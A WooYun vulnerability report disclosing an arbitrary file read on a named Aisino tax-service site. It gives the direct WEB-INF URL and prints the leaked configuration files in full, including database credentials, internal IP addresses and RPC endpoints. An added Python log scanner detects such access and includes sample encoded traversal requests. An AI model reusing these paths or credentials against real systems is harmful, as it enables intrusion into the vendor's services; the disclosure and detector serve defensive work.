Vulnerability summary

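Bug ID: wooyun-2015-0154523

Title: Arbitrary file read on an Aisino site (multiple configuration files involved)

Vendor: 航天信息股份有限公司 (Aisino Corporation)

Author: 路人甲

Submitted: 2015-11-20 14:39

Fixed: 2016-01-11 15:32

Publicly disclosed: 2016-01-11 15:32

Vulnerability type: Arbitrary file traversal/download

Severity: Medium

Self-assessed rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]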


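Vulnerability details

Disclosure status:

2015-11-20: Details sent to the vendor; waiting for the vendor to handle them
2015-11-25: Vendor confirmed; details disclosed to the vendor only
2015-12-05: Details disclosed to core white hats and experts in related fields
2015-12-15: Details disclosed to regular white hats
2015-12-25: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

Here's another one.

Detailed description: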

http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/web.xml

Proof of vulnerability:

web.xml

<web-app>
<context-param>
<param-name>webAppRootKey</param-name>
<param-value>app1.root</param-value>
</context-param>
<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/ApplicationContext.xml</param-value>
</context-param>
<context-param>
<param-name>log4jConfigLocation</param-name>
<param-value>/WEB-INF/classes/log4j.properties</param-value>
</context-param>
<servlet>
<servlet-name>RpcServlet</servlet-name>
<servlet-class>com.caucho.hessian.server.HessianServlet</servlet-class>
<init-param>
<param-name>home-class</param-name>
<param-value>com.aisino.ahbsdt.rpc.NssbRPCImpl</param-value>
</init-param>
<init-param>
<param-name>home-api</param-name>
<param-value>com.aisino.ahbsdt.rpc.INssbRPC</param-value>
</init-param>
</servlet>
<servlet>
<servlet-name>SpringContext</servlet-name>
<servlet-class>com.aisino.ahbsdt.util.SpringContext</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<listener>
<listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
</listener>
<servlet>
<servlet-name>action</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>/WEB-INF/struts-config.xml</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>3</param-value>
</init-param>
<init-param>
<param-name>detail</param-name>
<param-value>3</param-value>
</init-param>
<load-on-startup>0</load-on-startup>
</servlet>
<servlet>
<servlet-name>GenRandomDigiImg</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.GenRandomDigiImg</servlet-class>
</servlet>
<servlet>
<servlet-name>pbdb</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.PbBdServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>log4jConfigLocation</servlet-name>
<servlet-class>org.springframework.web.util.Log4jConfigServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet>
<servlet-name>RPCLoginServlet</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.RPCLoginServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>RPCLoginMd5Servlet</servlet-name>
<servlet-class>com.aisino.ahbsdt.web.servlet.RPCLoginMd5Servlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RpcServlet</servlet-name>
<url-pattern>/servlet/RpcServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>pbdb</servlet-name>
<url-pattern>/servlet/PbBdTemp</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>GenRandomDigiImg</servlet-name>
<url-pattern>/servlet/GenRandomDigiImg</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>RPCLoginServlet</servlet-name>
<url-pattern>/servlet/RPCLoginServlet</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>RPCLoginMd5Servlet</servlet-name>
<url-pattern>/servlet/RPCLoginMd5Servlet</url-pattern>
</servlet-mapping>
<mime-mapping>
<extension>doc</extension>
<mime-type>application/msword</mime-type>
</mime-mapping>
<welcome-file-list>
<welcome-file>login.jsp</welcome-file>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
<taglib>
<taglib-uri>http://struts.apache.org/tags-bean</taglib-uri>
<taglib-location>/WEB-INF/tld/struts-bean.tld</taglib-location>
</taglib>
<taglib>
<taglib-uri>http://struts.apache.org/tags-logic</taglib-uri>
<taglib-location>/WEB-INF/tld/struts-logic.tld</taglib-location>
</taglib>
</web-app>


struts-config.xml

<struts-config>
<data-sources/>
<form-beans>
<form-bean name="Post" type="com.aisino.ahbsdt.web.form.PostForm"/>
</form-beans>
<global-exceptions/>
<global-forwards>
<forward name="login" path="/login.jsp" redirect="false"/>
<forward name="login_success" path="/index.jsp" redirect="false"></forward>
</global-forwards>
<action-mappings>
<action parameter="act" path="/login" type="com.aisino.ahbsdt.web.action.LoginAction">
<forward name="postslistforadmin" path="/adminpostlist.jsp"/>
<forward name="viewpostslist" path="/postlist.jsp"/>
</action>
<action name="Post" path="/post" parameter="method" type="com.aisino.ahbsdt.web.action.PostAction">
<forward name="list" path="/postlist.jsp"/>
</action>
<action path="/theme" parameter="method" type="com.aisino.ahbsdt.web.action.ThemeAction"/>
<action path="/taxReport" parameter="method" type="com.aisino.ahbsdt.web.action.TaxReportAction"/>
<action path="/download" type="com.aisino.ahbsdt.web.action.DownloadAction">
<forward name="unauthorized" path="/403.html"/>
<forward name="fileNotFound" path="/404.html"/>
</action>
<action path="/showMessage" type="com.aisino.ahbsdt.web.action.ShowMessageAction" parameter="method"></action>
</action-mappings>
<controller>
<set-property property="processorClass" value="org.springframework.web.struts.AutowiringRequestProcessor"/>
</controller>
<message-resources parameter="com.aisino.struts.ApplicationResources"/>
<plug-in className="org.springframework.web.struts.ContextLoaderPlugIn">
<set-property property="contextConfigLocation" value="/WEB-INF/applicationContext.xml"/>
</plug-in>
</struts-config>


ApplicationContext.xml

<beans>
<!--
<bean id="bsdtDS" class="org.apache.commons.dbcp.BasicDataSource"
destroy-method="close">
<property name="driverClassName">
<value>oracle.jdbc.OracleDriver</value>
</property>
<property name="url">
<value>jdbc:oracle:thin:@172.16.1.196:1521:nsfwdb</value>
</property>
<property name="username">
<value>htxx</value>
</property>
<property name="password">
<value>oracle</value>
</property>
</bean>

-->
<bean id="bsdtDS" class="org.springframework.jndi.JndiObjectFactoryBean">
<property name="jndiName">
<value>NSFW_DB</value>
</property>
</bean>
<bean id="increment" class="org.springframework.jdbc.support.incrementer.OracleSequenceMaxValueIncrementer">
<property name="incrementerName" value="SEQ_DT_POSTID"/>
<property name="dataSource" ref="bsdtDS"/>
</bean>
<bean id="oracleLobHandler" class="org.springframework.jdbc.support.lob.OracleLobHandler">
<property name="nativeJdbcExtractor">
<bean class="org.springframework.jdbc.support.nativejdbc.CommonsDbcpNativeJdbcExtractor"/>
</property>
</bean>
<bean id="postDAO" class="com.aisino.ahbsdt.dao.impl.PostDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
<property name="handler">
<ref bean="oracleLobHandler"/>
</property>
<property name="increment">
<ref bean="increment"/>
</property>
</bean>
<!-- Local business classes -->
<!--
<bean id="bsdtBUSImpl" class="test.TestBsdtService">
-->
<!-- <property name="bsdtDAO"> -->
<!-- <ref bean="bsdtDAOImpl" /> -->
<!-- </property> -->
<!-- <property name="rpcbus"> -->
<!-- <ref bean="rpcbus" /> -->
<!-- </property> -->
<!-- </bean> -->
<bean id="postService" class="com.aisino.ahbsdt.bus.impl.PostBUSImpl">
<property name="dao">
<ref bean="postDAO"/>
</property>
</bean>
<bean id="bsdtDAOImpl" class="com.aisino.ahbsdt.dao.impl.BsdtDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
</bean>
<bean id="bsdtBUSImpl" class="com.aisino.ahbsdt.bus.impl.BsdtBUSImpl">
<property name="bsdtDAO">
<ref bean="bsdtDAOImpl"/>
</property>
<property name="rpcbus">
<ref bean="rpcbus"/>
</property>
</bean>
<bean id="lwzcBUSImpl" class="com.aisino.ahbsdt.bus.impl.LwzcBUSImpl"></bean>
<bean id="rpcbus" class="com.aisino.ahbsdt.bus.impl.RpcBUSImpl">
<property name="nssbrpc">
<ref bean="nsrxxServiceRPC"/>
</property>
</bean>
<!-- Remote invocation -->
<bean id="hessianProxyFatory" class="com.caucho.hessian.client.HessianProxyFactory">
<property name="readTimeout" value="90000"/>
</bean>
<bean id="nsrxxServiceRPC" class="org.springframework.remoting.caucho.HessianProxyFactoryBean">
<property name="proxyFactory">
<ref bean="hessianProxyFatory"/>
</property>
<property name="serviceUrl" value="http://61.190.68.67/nssbweb_ais/RpcServlet"/>
<property name="serviceInterface" value="aisino.nssb.ejb.NSSBRpc"/>
</bean>
<bean id="declarationAuthenticationService" class="org.springframework.remoting.caucho.HessianProxyFactoryBean">
<property name="serviceUrl" value="http://192.168.2.13:8011/ahwsbsdt/servlet/RpcServlet"/>
<property name="serviceInterface" value="com.aisino.ahbsdt.rpc.INssbRPC"/>
</bean>
<!-- Permissions -->
<bean id="permissionService" class="com.aisino.ahbsdt.bus.impl.PermissionBUSImpl"></bean>
<!-- UI module configuration -->
<bean id="themeConfig" class="com.aisino.ahbsdt.web.theme.ThemeConfig" init-method="refresh">
<property name="themeConfigLoader" ref="themeConfigLoader"/>
</bean>
<bean id="themeConfigLoader" class="com.aisino.ahbsdt.web.theme.XMLThemeConfigLoader"/>
<bean id="showMessageDAOImpl" class="com.aisino.ahbsdt.dao.impl.ShowMessageDAOImpl">
<property name="dataSource">
<ref bean="bsdtDS"/>
</property>
</bean>
</beans>


log4j.properties

log4j.rootLogger=error,CON
log4j.logger.com=ERROR,stdout
log4j.appender.CON=org.apache.log4j.ConsoleAppender
log4j.appender.CON.layout=org.apache.log4j.PatternLayout
log4j.appender.CON.layout.ConversionPattern=[%d] %-5p %c - %m%n
#logfile configure
log4j.appender.logfile=org.apache.log4j.DailyRollingFileAppender
log4j.appender.logfile.File=nsfw_error.log
log4j.appender.logfile.layout=org.apache.log4j.PatternLayout
log4j.appender.logfile.layout.ConversionPattern= %d %p [%c] - <%m>%n

Fix:

Permissions~~

Copyright notice: when reposting, please credit the source 路人甲@乌云
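To check whether a server has actually answered requests for files under WEB-INF, as with the URL in this report, its access logs can be scanned for successful responses to such paths. The following is an added example, not part of the original report: it assumes Combined Log Format, the function names are illustrative, and the log lines and client addresses are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Directories a servlet container must never serve to clients.
PROTECTED = {"web-inf", "meta-inf"}

# Assumed Combined Log Format: client - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target: str) -> str:
    """Reduce a request target to the path the server would resolve."""
    path = target.split("?", 1)[0]
    for _ in range(3):  # decode repeatedly so nested encoding is resolved too
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    # Drop ";param" suffixes, which servlet containers strip from each segment.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def touches_protected(target: str) -> bool:
    return any(seg in PROTECTED for seg in normalize(target).split("/"))

def served_protected(lines):
    """Return (client, target, status) for protected paths answered with 2xx."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["status"].startswith("2") and touches_protected(m["target"]):
            hits.append((m["client"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [20/Nov/2015:14:01:02 +0800] "GET /ahwsbsdt/login.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Nov/2015:14:01:09 +0800] "GET /ahwsbsdt/WEB-INF/web.xml HTTP/1.1" 200 4211',
    '198.51.100.4 - - [20/Nov/2015:14:02:30 +0800] "GET /ahwsbsdt/web-inf/struts-config.xml HTTP/1.1" 404 312',
    '198.51.100.4 - - [20/Nov/2015:14:02:41 +0800] "GET /ahwsbsdt/%57EB-INF/classes/log4j.properties HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for hit in served_protected(SAMPLE):
        print(hit)
```

A hit means the file content left the server, so every credential and internal address in the served files should be treated as exposed.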


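Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-11-25 10:27

Vendor reply:

Thank you for the feedback; we have contacted our technical staff to handle it.

Latest status:

None yet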